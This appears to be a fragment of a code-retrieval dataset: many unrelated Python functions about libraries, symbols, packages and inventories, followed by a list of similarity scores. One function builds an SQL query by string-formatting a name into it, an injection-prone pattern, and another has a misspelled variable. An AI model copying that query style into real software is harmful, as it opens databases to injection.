"def __item_installed(name, item_type):\n\n if item_type == dtf.core.item.TYPE_MODULE:\n table = \"modules\"\n elif item_type == dtf.core.item.TYPE_LIBRARY:\n table = \"libraries\"\n elif item_type == dtf.core.item.TYPE_BINARY:\n table = \"binaries\"\n elif item_type == dtf.core.item.TYPE_PACKAGE:\n table = \"packages\"\n else:\n raise KeyError\n\n dtf_db = sqlite3.connect(DTF_DB)\n\n cur = dtf_db.cursor()\n\n sql = (\"SELECT id \"\n \"FROM %s \"\n \"WHERE name='%s' \"\n 'LIMIT 1' % (table, name))\n\n cur.execute(sql)\n\n return bool(cur.fetchone() is not None)", "def extract(self, lib):\n cmd = [self.tool] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n dyn_syms = self.get_dynsym_table(out)\n return self.process_syms(dyn_syms)", "def _build_lookup(tree: dict, stdlib_lookup: bool = False) -> None:\n def _apply(item: dict, python_stdlib: set) -> None:\n if item[\"type\"] == \"module\" and item[\"imports\"]:\n package = item[\"fullname\"].partition(\".\")[0]\n for import_module in item[\"imports\"].values():\n import_module[\"lookup\"] = None\n name, level, relative = _get_name_level_relative_import_module(import_module)\n # So we first try to find a module with the expected name in the same directory\n # We look the parent item of the current module\n target = _look_in_package(tree, item[\"path\"], name, level=level)\n if target:\n import_module[\"lookup\"] = target\n else:\n # We now look if a package or module has the same name (within the same package)\n target = find_tree(\n tree,\n lambda x, n, p: (x[\"fullname\"] == n) and (x[\"fullname\"].partition(\".\")[0] == p),\n args=(name, package)\n )\n if target:\n import_module[\"lookup\"] = target[\"path\"]\n elif relative:\n # We haven't found so it might be a symbol imported by a package in __init__.py\n # We don't want to let an internal reference as not found\n import_module[\"lookup\"] = \"@internal\"\n elif name.partition(\".\")[0] == item[\"fullname\"].partition(\".\")[0]:\n # This is in case a module from within the same package has not been found\n # We don't want to let an internal reference as not found\n import_module[\"lookup\"] = \"@internal\"\n else:\n # In last resort, we look for the package in the standard library\n if name in python_stdlib:\n import_module[\"lookup\"] = \"@stdlib\"\n apply_tree(tree, _apply, args=(_build_python_stdlib(stdlib_lookup),))", "def list(full, field):\n\n short = not full \n\n libraries = select(l for l in Library if l)[:]\n libraries = natsorted(libraries, key=lambda x : attrgetter('name')(x).lower())\n\n if len(libraries) == 0:\n logger.info(\"[!] 
No libraries available to list.\") \n logger.info(\" Consider run the following command:\")\n logger.info(\" $ apkg init\")\n return \n\n\n\n orderFields = [ \n #, \"library\"\n #, \"sha\"\n \"description\"\n # , \"license\"\n # , \"include\"\n # , \"depend\"\n # , \"testedWith\"\n , \"keywords\"\n # , \"installed\"\n # , \"cached\"\n # , \"fromIndex\"\n # , \"fromUrl\"\n # , \"fromGit\"\n , \"origin\"\n # , \"default\"\n ]\n\n i = 0\n if short and field == \"\":\n logger.info(\"{:<20.20} {:<15.20} {:.72}\"\n .format(\"Library name\", \"Latest version\", \"URL\"))\n logger.info(\"-\"*105)\n\n for library in libraries:\n v = library.getLatestVersion() \n if v is not None:\n if not short:\n\n logger.info(v.library.name)\n logger.info(\"=\"*len(v.library.name))\n\n info = v.info\n\n for k in orderFields: \n val = info.get(k, None)\n if val is not None or val != \"\" or len(val) > 0:\n click.echo(\"{0}: {1}\".format(k,val))\n\n vs = ','.join(str(ver) for ver in v.library.versions)\n \n if len(vs) > 0:\n print(\"Versions:\", vs)\n \n else:\n if field in listFields:\n if field == \"name\":\n print(v.library.name)\n elif field == \"version\":\n print(v.name)\n else:\n print(v.library.url)\n else:\n print(\"{:<20.20} {:<15.20} {:.72}\"\n .format(v.library.name,v.name,v.library.url))\n\n i += 1\n if not short and i < len(libraries):\n logger.info(\"\")", "def _key_func_3(entry: tuple[str, list]) -> str:\n key, (targets, sub_items, category_key) = entry\n # hack: mutating the sub_items dicts to a list in the key_func\n entry[1][1] = sorted(((sub_key, sub_targets)\n for (sub_key, (sub_targets, _0, _sub_category_key))\n in sub_items.items()), key=_key_func_2)\n\n if category_key is not None:\n return category_key\n\n # now calculate the key\n if key.startswith('\\N{RIGHT-TO-LEFT MARK}'):\n key = key[1:]\n letter = unicodedata.normalize('NFD', key[0])[0].upper()\n if letter.isalpha() or letter == '_':\n return letter\n\n # get all other symbols under one heading\n return _('Symbols')", "def search_by_shelf(library: list) -> None:\n user_input = input(f'What is the number/name of the shelf you want to search for?')\n found_books = []\n for book in library:\n if user_input.lower() == str(getattr(book, 'shelf')).lower():\n found_books.append(book)\n print(f'We found {len(found_books)} book(s) that matched this search in your library.\\n')\n for num, book in enumerate(found_books, 1):\n print(f'{num} - {book.__repr__()}')\n if len(found_books) > 0 and not return_to_main_menu():\n move_book(library, found_books)", "def get_library_keys(self):\n return list({\n self._create_library_locator(library_index, branch=None)\n for library_index\n in self.find_matching_course_indexes(branch=\"library\")\n })", "def locateObjNumberNoun(data, questionDict, questionIdict):\n how = questionDict['how']\n many = questionDict['many']\n for t in range(data.shape[0] - 2):\n if data[t, 0] == how and \\\n data[t + 1, 0] == many:\n for u in range(t + 2, data.shape[0]):\n word = questionIdict[data[u, 0] - 1]\n lexname = lookupLexname(word)\n if (lexname is not None and \\\n lexname.startswith('noun')) or \\\n (lexname is None):\n return data[u, 0]\n print 'not found'\n return data[-1, 0]", "def item_info():\n item_code = get_input(\"Enter item code: \")\n if item_code in FULL_INVENTORY:\n print_dict = FULL_INVENTORY[item_code]\n output = \"\"\n for key, value in print_dict.items():\n output += (\"{}:{}{}\".format(key, value, \"\\n\"))\n else:\n output = \"Item not found in inventory\"\n print(output)\n return output", "def 
symbol_name(string):\n return 'USymbol' + convert_name(string, True)", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def findSymbol(self, exp):\n k = str(exp)\n try:\n return self.currSyms[k]\n except KeyError:\n raise SymbolNotFound('Identifier not found:<%s>' % (k))", "def module_name(self):\n return \"py{0:s}\".format(self.library_name[3:])", "def get_package_info(package_name):\n r = requests.get(f'https://api.npms.io/v2/search?q={package_name}&size=1')\n response_json = r.json()\n\n if 'results' in response_json:\n result = response_json['results'][0]\n return result['package']", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def get_library(self,identifier=None,version=None,filename=None):\r\n\r\n session = self.session\r\n if identifier is not None and identifier > \"\":\r\n libraries = session.query(LibraryRecord).filter(LibraryRecord.id_name==identifier).order_by(desc(LibraryRecord.version)).all()\r\n if len(libraries) == 0:\r\n raise Exception(f\"No library with identifier {identifier} found\")\r\n else:\r\n libraryListStr = \"\"\r\n for library in libraries:\r\n libraryListStr += library.version+\",\"\r\n if version is not None and version > \"\":\r\n if version == library.version:\r\n return(library)\r\n if version is not None and version > \"\":\r\n raise Exception(f\"Unable to find version {version} of library {identifier}\")\r\n if len(libraries) == 1:\r\n return(library)\r\n raise Exception(f\"There are several version of this library ({libraryListStr}). 
Please specify a version\")\r\n return()\r\n\r\n elif filename is not None and filename > \"\":\r\n raise Exception(\"Search by filename not implemented\")\r\n else:\r\n raise Exception(\"Not enough information to find library\")\r\n\r\n return()", "def get_path(gi, path):\n\n sp = path.split(\"/\")\n if len(sp) == 0:\n raise Exception(\"cannot determine library\")\n\n library_name = sp[0]\n lib = gi.libraries.get_libraries(name=library_name)\n if not lib:\n return None\n\n if len(lib) > 1:\n raise Exception('found more than one library named \"%s\"', library_name)\n\n lib = lib[0]\n\n if len(sp) == 1:\n return lib\n\n subpath = \"/\" + '/'.join(sp[1:])\n contents = gi.libraries.show_library(lib[\"id\"], contents=True)\n for entry in contents:\n if entry[\"name\"] == subpath:\n return entry\n\n return None", "def checkLookup(self, name):\n if not self.symbols.has_key(name):\n # we don't care\n return None\n # is it one we really care about\n t = self.symbols[name].getType()\n if t == \"typedef\":\n t = self.symbols[name].getAliasType()\n if t == \"general\" or t == \"struct\" or t == \"union\":\n return self.symbols[name]", "def getLibVersion():\n return \"Software Development Library for Linux 1.999.1\"", "def libraryName(self):\n return _osgAnimation.LinkVisitor_libraryName(self)", "def display_library_details():\n\n acct = get_current_account(session['acct'])\n if request.method == \"POST\":\n # post request response goes here\n library = request.form.get(\"library_id\")\n session['lib'] = library\n flash(\"Thanks for selecting your library system!\")\n return redirect(\"/library\")\n\n else:\n if 'lib' in session:\n lib = session['lib']\n library = get_library_details(lib, OVRDRV_KEY, OVRDRV_SECRET)\n\n else:\n library = None\n\n return render_template(\"library_info.html\", library=library, acct=acct)", "def lookup():", "def _get_playlist_index_by_name(library_list, playlist_name):\n for playlist in library_list:\n if playlist['name'] == playlist_name:\n return library_list.index(playlist)\n return None", "def get_symbol_value(self, obj, name):\n # Lookup symbol:\n if obj.has_symbol(name):\n return obj.get_symbol_value(name)\n elif name in self.extra_symbols:\n return self.extra_symbols[name]\n else:\n raise CompilerError(\n 'Undefined reference \"{}\"'.format(name))", "def get_package_info():\n\n with open(hack.CONDA_ARTIFACT_FILENAME, 'r') as fn:\n pkg_location = fn.read().strip()\n pkg_name = os.path.basename(pkg_location)\n\n return pkg_location, pkg_name", "def get_item_code_for_item_id(item_id):\n records = frappe.db.sql(\"\"\"\n SELECT ebay.sku\n FROM `zeBayListings` as ebay\n WHERE ebay.ebay_id = %(item_id)s;\n \"\"\", {'item_id': item_id}, as_dict=True)\n if len(records) > 1:\n raise ErpnextEbaySyncError(f'Too many hits for item {item_id}!')\n elif records:\n return records[0].sku\n # We have not located the item.\n item_data = None\n try:\n item_data = get_item_trading(item_id, output_selector=['SKU'])\n except ConnectionError as e:\n if e.response.dict()['Errors']['ErrorCode'] == 17:\n # Could not find/not allowed error\n raise ErpnextEbaySyncError(f'Could not find {item_id}!')\n else:\n raise\n return item_data['SKU']", "def nm(filename):\n binary = parse(filename) # Build an abstract binary\n symbols = binary.symbols\n\n if len(symbols) > 0:\n for symbol in symbols:\n print(symbol)\n else:\n print(\"No symbols found\")", "def test_GetSymbolMapping_parameter_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] 
Caching mojo app \"\n \"https://apps.mojo/myapp.mojo?q=hello at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def searchLib(self, logger):\n # Now search\n self._version_strings = []\n self._sanity_exists = False\n for bin_str in self._all_strings:\n # we have a match\n if self.VERSION_STRING in str(bin_str):\n version_string = str(bin_str)\n # valid match\n logger.debug(\"Located a version string of %s in address 0x%x\", self.NAME, bin_str.ea)\n # save the string for later\n self._version_strings.append(version_string)\n # check the sanity string\n if self.SANITY_STRING in str(bin_str):\n self._sanity_exists = True\n\n # return the result\n if self._sanity_exists and len(self._version_strings) == 0:\n return 1\n else:\n return len(self._version_strings)", "def map_release_label():\n release = \"\".join(map(lambda x: x.lower(), sh.lsb_release(\"-irs\").split()))\n return OS_MAPPING[next(k for k in OS_MAPPING if re.search(k, release))]", "def lib_name_path(interface, simulator):\n library_name_path = os.path.join(libs_dir, lib_name(interface, simulator))\n\n # On Windows use mixed mode \"c:/a/b/c\" as this work in all cases\n if os.name == \"nt\":\n return library_name_path.replace(\"\\\\\", \"/\")\n\n return library_name_path", "def libraryName(self):\n return _osgAnimation.Bone_libraryName(self)", "def read_symbol(table, index, br):\n x_bits = br.read_bits(16, 0) # The C reference version assumes 15 is the max needed and uses 16 in this function\n index += (x_bits & HUFFMAN_TABLE_MASK)\n nbits = table[index].bits - HUFFMAN_TABLE_BITS\n skip = 0\n if nbits > 0:\n skip = HUFFMAN_TABLE_BITS\n index += table[index].value + ((x_bits >> HUFFMAN_TABLE_BITS) & br.kBitMask[nbits])\n br.read_bits(None, skip + table[index].bits)\n return table[index].value", "def _ask_ctypes(self):\n if os.name == 'nt':\n libpath = find_library(self._libname)\n libpath = libpath if libpath is not None else find_library(self._libname + '.dll')\n else:\n libpath = find_library(self._libname)\n return str(libpath) if libpath is not None else libpath", "def split_lib_transform(header):\r\n if header.startswith('>'):\r\n header = header[1:]\r\n fields = header.split()\r\n lib_id = fields[0]\r\n qual_id = fields[1]\r\n bc = fields[2].split('=')[1]\r\n return ' '.join([lib_id, 'read_id=' + qual_id, 'barcode=' + bc]), qual_id", "def getSymbol(self, name: unicode, namespace: ghidra.program.model.symbol.Namespace) -> ghidra.program.model.symbol.Symbol:\n ...", "def get_data(symbollist, index_name, ext = ''):\n\n data_lists = {}\n for index, symbol in enumerate(symbollist):\n symbollist[index] = (symbol + ext, data_lists, index_name)\n pool = Pool(5)\n ##map symbol list to _get_data() fn. 
return tuple, with (symbol, statlist).\n \n pool.map(_get_data, symbollist)\n return data_lists", "def __getitem__(self,name):\n if not isinstance(name,str):\n raise KeyError('Dae key must be a string')\n\n try:\n return self._syms[name]\n except KeyError:\n raise KeyError(name+' is not a symbol in Dae')", "def list_library(command):\n namespace = app.main(command)\n assert namespace.command == 'll' or namespace.command == \"listlibrary\"", "def _get_asset_info(item, name):\n\n if name in item.assets:\n return item.assets[name]\n elif name.replace(\"B\", \"B0\") in item.assets:\n # Bx -> B0x\n return item.assets[name.replace(\"B\", \"B0\")]\n elif name.replace(\"B0\", \"B\") in item.assets:\n # B0x -> Bx\n return item.assets[name.replace(\"B0\", \"B\")]\n else:\n available = [key for key in item.assets.keys() if key not in [\"thumbnail\", \"overview\", \"info\", \"metadata\"]]\n raise KeyError(\"asset '%s' not found. Available assets: %s\" % (name, avaialable))" ]
[ "0.6351624", "0.588709", "0.558512", "0.5506981", "0.5491768", "0.5448772", "0.5388454", "0.5337695", "0.53156734", "0.5299146", "0.5281417", "0.5229371", "0.52056694", "0.5185004", "0.51806813", "0.51693463", "0.5163847", "0.51593566", "0.5133286", "0.51013744", "0.5091456", "0.50519097", "0.5029301", "0.50138074", "0.5013332", "0.4988081", "0.4985455", "0.49746305", "0.49648404", "0.49640262", "0.49518466", "0.4949847", "0.4941515", "0.49295548", "0.49140912", "0.49124053", "0.49078113", "0.488187", "0.4878763", "0.48754877", "0.48567316", "0.48476222", "0.4846103", "0.48457322", "0.48445532", "0.48391345", "0.48325667", "0.48243767", "0.48120725", "0.48071355", "0.47984004", "0.47968072", "0.47937652", "0.47777846", "0.47749016", "0.4758529", "0.47584274", "0.47584274", "0.47517747", "0.47268784", "0.4726851", "0.4721849", "0.47049534", "0.47031766", "0.46996257", "0.46938804", "0.46934348", "0.4688084", "0.46866497", "0.46788383", "0.46788183", "0.46743703", "0.46701276", "0.46660313", "0.46596953", "0.46572125", "0.46485057", "0.46482366", "0.46321243", "0.4630092", "0.46293744", "0.46245", "0.46183664", "0.4616756", "0.46138155", "0.46116", "0.4611277", "0.458535", "0.45765162", "0.45691192", "0.45682168", "0.45665196", "0.45645127", "0.45634645", "0.4546012", "0.45434552", "0.45407277", "0.45389536", "0.45369545", "0.45348755" ]
0.78984857
0
Test on a data set of songs and known genres.
def test(self, songs, genres):
    logging.info('Starting testing.')
    num_matches = 0
    confusion_matrix = ConfusionMatrix(genres)
    for song, actual_genre in zip(songs, genres):
        predicted_genre = self.classify(song)
        logging.info('Actual genre: {}, predicted genre: {}'.format(actual_genre, predicted_genre))
        confusion_matrix.add_genres(actual_genre, predicted_genre)
        if actual_genre == predicted_genre:
            num_matches += 1
    return num_matches, confusion_matrix
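A self-contained sketch of how a test() with this contract is driven and how its return pair becomes an accuracy figure. The StubClassifier and StubConfusionMatrix names, the always-'rock' prediction, and the song list are all stand-ins invented for the example; the real classify() and ConfusionMatrix come from the surrounding project.

class StubConfusionMatrix:
    """Stand-in for ConfusionMatrix: just records (actual, predicted) pairs."""
    def __init__(self, genres):
        self.pairs = []
    def add_genres(self, actual, predicted):
        self.pairs.append((actual, predicted))

class StubClassifier:
    """Stand-in classifier that always predicts 'rock'."""
    def classify(self, song):
        return 'rock'
    def test(self, songs, genres):
        # Same contract as the method above, using the stub confusion matrix.
        num_matches = 0
        confusion_matrix = StubConfusionMatrix(genres)
        for song, actual_genre in zip(songs, genres):
            predicted_genre = self.classify(song)
            confusion_matrix.add_genres(actual_genre, predicted_genre)
            if actual_genre == predicted_genre:
                num_matches += 1
        return num_matches, confusion_matrix

songs = ['a.mp3', 'b.mp3', 'c.mp3']
genres = ['rock', 'jazz', 'rock']
matches, cm = StubClassifier().test(songs, genres)
print('accuracy: {:.2%}'.format(matches / len(songs)))  # -> accuracy: 66.67%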
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_songs_by_genre(self, track_elms, service_config, request):\n genre_id = uuid.UUID(avalon.compat.to_uuid_input('c12d2a49-d086-43d6-953d-b870deb24228'))\n service_config.track_store.get_by_genre.return_value = track_elms\n service_config.id_cache.get_genre_id.return_value = genre_id\n request.args['genre'] = 'Genre'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_genre.assert_called_with(genre_id)", "def test_get_songs_by_genre_id(self, track_elms, service_config, request):\n genre_id = uuid.UUID(avalon.compat.to_uuid_input('26ce4d6b-af97-45a6-b7f6-d5c1cbbfd6b1'))\n service_config.track_store.get_by_genre.return_value = track_elms\n request.args['genre_id'] = six.text_type(genre_id)\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_genre.assert_called_with(genre_id)", "def get_metadata(data):\n genres = list(data[\"genre\"])\n print(\"genres:\", len(set(genres)), set(genres))\n return genres", "def find_genre_playlists(data):\n playlists = []\n\n if data['genre']:\n playlists += data['genre']\n\n if data['comments']:\n playlists += data['comments']\n\n matches = re.findall('\\(\\s*(cover|live|unplugged|acoustic|remix|instrumental)', data['title'].lower())\n if matches:\n if 'cover' in matches:\n matches.remove('cover')\n matches += ['covers']\n\n if 'acoustic' in matches:\n matches.remove('acoustic')\n matches += ['unplugged']\n\n if 'remix' in matches:\n matches.remove('remix')\n matches += ['remix']\n\n if 'instrumental' in matches:\n matches.remove('instrumental')\n matches += ['instrumental']\n\n playlists += matches\n\n return set([x for x in playlists if x != 'none'])", "def test_iter_genotypes(self):\n with self.reader_f() as f:\n for g in f.iter_genotypes():\n variant_name = VARIANT_NAME_FIX.get(\n (truth.variant_to_key[g.variant], g.coded),\n truth.variant_to_key[g.variant],\n )\n\n expected = truth.genotypes[variant_name]\n self.assertEqual(expected, g)", "def random_by_genre_track_list(self):\n\n genre = self.addon_args[\"foldername\"][0].decode(\"utf-8\")\n\n xbmcplugin.setContent(self.addon_handle, \"songs\")\n\n for track in self.connection.walk_random_songs(\n size=self.random_count, genre=genre):\n self.add_track(track, show_artist=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def test_songs_played(self):\n self.assertEqual(self.show.song_booleans, {\n 'you-enjoy-myself': 1,\n 'tweezer': 0\n })", "def classical_search(data, primary, genre):\n __counter = 0 # count total number of songs get\n __browser = chrome_driver_setup()\n\n # read data file, extract list of artists\n artists = txt_to_list(data, delimiter=',')\n\n # for each artist, find artist id and then output list of album names\n __index = 0\n make_directory(\"results/{}\".format(primary))\n filecount = 0\n while filecount <= len(artists)//10:\n print(\"========== Starting for batch {} - {} ==========\".format(filecount*10,(filecount+1)*10))\n for artist in artists[filecount*10:(filecount+1)*10]:\n print(\" NOW FOR ARTIST: {} \".format(artist))\n aid = get_artist_id(artist)\n if aid is None:\n print(\"Cannot find artist {} in Spotify.\".format(artist))\n 
continue\n album_ids = get_artist_albums_classical(aid)\n for album in album_ids:\n tracks = get_album_tracks(album, 'name')\n if tracks is None:\n print(\"Artist {} has no album found in Spotify.\".format(artist))\n continue\n for track in tracks:\n if track is None or track == \"\":\n print(\"Empty track, skip...\")\n continue\n print(\"Current track: {}\".format(track))\n sleep(randint(3, 5))\n __index += 1\n link, score, title, duration = get_song_for_classical(track, __browser, genre)\n if link == \"skipped\":\n print(\"Duplicate, skip...\")\n continue\n csv_writer_append(\"results/{}/{}_{}.csv\".format(primary, genre, filecount+1),\n __index,\n track,\n title,\n link,\n score,\n duration)\n print(\"{} -- CSV done: {} {} {} {}\".format(__index, title, link, score, duration))\n print(\"\")\n print(\"||||||||||| Finished for batch {} - {} |||||||||||\".format(filecount*10,(filecount+1)*10))\n filecount += 1", "def get_genius_song(song_name, artist_name, genius):\n song_search = song_name\n for i in range(0, 2):\n song = genius.search_song(song_search, artist_name)\n if isinstance(song, type(None)) or not match(\n\t (song_search, artist_name), (song.title, song.artist)\n ):\n if i:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius\")\n return\n else:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius trying cleaning\")\n song_search = clean(song_search)\n else:\n if i:\n log(f\"Found match for '{song_search}' by '{artist_name}'\")\n break\n\n return song", "def setUp(self):\n\n self.song_a = Song('a', 1)\n self.song_b = Song('b', 2)\n self.song_c = Song('c', 3)\n self.song_d = Song('d', 4)\n\n self.song_e = Song('e', 5)\n self.song_f = Song('f', 6)\n self.song_e.similar_songs.append(self.song_f)\n self.song_f.similar_songs.append(self.song_e)", "def test_readSongData():\n\n # make sure the number of columns pull out from the database is correct\n assert svd.song_df.shape[1] == 8", "def test_get_g_data_1(self):\n self.db_filter.values = [40481]\n\n g_data = review.get_g_data(self.alchemist, self.db_filter, 40481)\n\n self.assertTrue(isinstance(g_data, list))\n\n for header in review.PG_HEADER:\n with self.subTest(header=header):\n self.assertTrue(header in g_data[0].keys())\n self.assertFalse(isinstance(g_data[0][header], list))", "def random_by_genre_list(self):\n\n for genre in self.connection.walk_genres():\n url = self.build_url({\n \"mode\": \"random_by_genre_track_list\",\n \"foldername\": genre[\"value\"].encode(\"utf-8\")})\n\n li = xbmcgui.ListItem(genre[\"value\"])\n xbmcplugin.addDirectoryItem(\n handle=self.addon_handle, url=url, listitem=li, isFolder=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def test_get_genres_no_params(self, id_name_elms, service_config, request):\n service_config.genre_store.get_all.return_value = id_name_elms\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_genres(params)\n\n assert results == id_name_elms, 'Expected all genres returned'", "def cheer(self, songs):\n if self.favourite_song in songs:\n return \"Whoo!\"", "def test_rawdata(data):\n base = list(data)[0]\n if base in [\"tv\",\"leftovers\",\"tv short\",\"movie\",\"OVA / ONA / Special\"]:\n return True\n return False", "def test_SampleIds(self):\r\n exp = [\"PC.354\", \"PC.355\", \"PC.356\", \"PC.481\", \"PC.593\", \"PC.607\",\r\n \"PC.634\", \"PC.635\", \"PC.636\"]\r\n obs = self.overview_map.SampleIds\r\n self.assertEqual(obs, exp)\r\n\r\n obs = 
self.no_metadata.SampleIds\r\n self.assertEqual(obs, exp)\r\n\r\n obs = self.empty_map.SampleIds\r\n self.assertEqual(obs, [])", "def get_artist_songs(self,genre = \"[Not Provided]\"):\n # Search for the artist and get their id\n search_artist = self.search(self.artist_name)\n\n #Prevents the stoppage in case of an Artist having zero lyrics on Genius\n if len(search_artist['response']['hits']) == 0:\n return False\n \n artist_id = str(search_artist['response']['hits'][0]['result']['primary_artist']['id'])\n print(\"ID: \" + artist_id)\n # Initialize DataFrame\n df = pd.DataFrame(columns=['title', 'url'])\n # Iterate through all the pages of the artist's songs\n more_pages = True\n page = 1\n i = 0\n while more_pages:\n # Make a request to get the songs of an artist on a given page\n request_url = self.base_url + 'artists/' + artist_id + '/songs' + '?per_page=50&page=' + str(page)\n response = requests.get(request_url, headers=self.headers).json()\n\n # For each song which the given artist is the primary_artist of the song, add the song title and\n # Genius URL to the DataFrame\n for song in response['response']['songs']:\n if str(song['primary_artist']['id']) == artist_id:\n title = song['title']\n url = song['url']\n df.loc[i] = [title, url]\n i += 1\n page += 1\n\n if response['response']['next_page'] is None:\n more_pages = False\n\n \n # Get the HTML and Song Lyrics from helper methods in the class\n df['artist'] = self.artist_name\n df['html'] = df['url'].apply(self.get_song_html)\n df['lyrics'] = df.apply(lambda row: self.get_lyrics(row.html), axis=1)\n #Uncomment to use the genre method otherwise\n #df['genre'] = df.apply(lambda row: self.get_genre(row.html), axis=1)\n df['genre'] = genre\n \n del df['url']\n del df['html']\n\n self.artist_songs = df\n\n return self.artist_songs", "def test_SampleIds(self):\n exp = [\"PC.354\", \"PC.355\", \"PC.356\", \"PC.481\", \"PC.593\", \"PC.607\",\n \"PC.634\", \"PC.635\", \"PC.636\"]\n obs = self.overview_map.SampleIds\n self.assertEqual(obs, exp)\n\n obs = self.no_metadata.SampleIds\n self.assertEqual(obs, exp)\n\n obs = self.empty_map.SampleIds\n self.assertEqual(obs, [])", "def test_get_gm_track_artists_ft_1(self):\r\n gm_track = gmusic.GMusicTrack(\r\n title='Stretch Deep (feat. 
Eve Essex)',\r\n artist='James K'\r\n )\r\n expected = ['Eve Essex', 'James K']\r\n actual = gmspotify.get_gm_track_artists(gm_track)\r\n self.assertEqual(actual, expected)", "def get_songs(self, song_list):\n self.songs = [[s.name, s.movie_name] for s in song_list\n if s.raga == self.name]", "def albums_by_genre_list(self):\n\n genre = self.addon_args[\"foldername\"][0].decode(\"utf-8\")\n\n xbmcplugin.setContent(self.addon_handle, \"albums\")\n\n for album in self.connection.walk_album_list_genre(genre):\n self.add_album(album, show_artist=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def test_two_tracks_various_artists(self):\n self.add_mp3(filename='1.mp3')\n self.add_mp3(filename='2.mp3', set_artist=True, artist='Artist 2')\n (added, status) = self.app.add_album(self.filenames)\n self.assertEqual(added, True)\n self.assertEqual(self.get_album_count(), 1)\n album = Album.get_by_artist_album(self.app.curs, 'Various', 'Album')\n self.assertNotEqual(album, None)\n self.assertEqual(album.artist, 'Various')\n self.assertEqual(album.album, 'Album')\n self.assertEqual(album.album_type, 'album')\n self.assertEqual(album.totalseconds, 4)\n self.assertEqual(album.totaltracks, 2)", "def process_songs(songs):\r\n print(\"[SETUP] STATUS: Creating the pool.\")\r\n workers = multiprocessing.Pool(pool_size())\r\n print(\"[SETUP] STATUS: Pool created with {} workers, assigning work.\".format(pool_size()))\r\n results = workers.map(cut_and_eq, songs)\r\n workers.close()\r\n workers.join()\r\n\r\n results = [result for result in results if result is not None]\r\n return results", "def __test_and_train(self):\n f = open(\"all_data_info.csv\")\n reader = csv.DictReader(f, delimiter=\",\")\n data = []\n for line in reader:\n if line['artist_group'] == \"train_and_test\" and line[\"in_train\"] == \"False\":\n # the img's artist is in training set\n # but the img is in test set only\n data.append((line['artist'], line['new_filename']))\n\n return data", "def get_song_artist_matches():\n resulta, results, all_data = get_song_artist()\n answers = {}\n for entry in resulta:\n if entry in results:\n answers[entry] = [[], []]\n # for info in chk_conc_scan.all_data:\n for info in all_data:\n if entry == info[0]:\n answers[entry][0].append(info)\n if entry == info[1]:\n answers[entry][1].append(info)\n structv = {}\n for dupval in answers:\n structv[dupval] = []\n for entry in answers[dupval]:\n best = 100\n record = []\n for week in entry:\n if week[3] < best:\n record = week\n best = week[3]\n structv[dupval].append(record)\n return output_info(structv)", "def test_get_songs_by_album(self, track_elms, service_config, request):\n album_id = uuid.UUID(avalon.compat.to_uuid_input('f83fdec7-510f-44a5-87dc-61832669a582'))\n service_config.track_store.get_by_album.return_value = track_elms\n service_config.id_cache.get_album_id.return_value = album_id\n request.args['album'] = 'Album'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_album.assert_called_with(album_id)", "def _get_genres(self):\n separated = self.movies['genre'].apply(self.separate_genre)\n return {g: True for x in separated for g in x}.keys()", "def get_data(data, exit_fail=True):\n try:\n if data['track_name'] and data['artist_name']:\n for song in itunespy.search_track(data['track_name']):\n if data['artist_name'].lower() == 
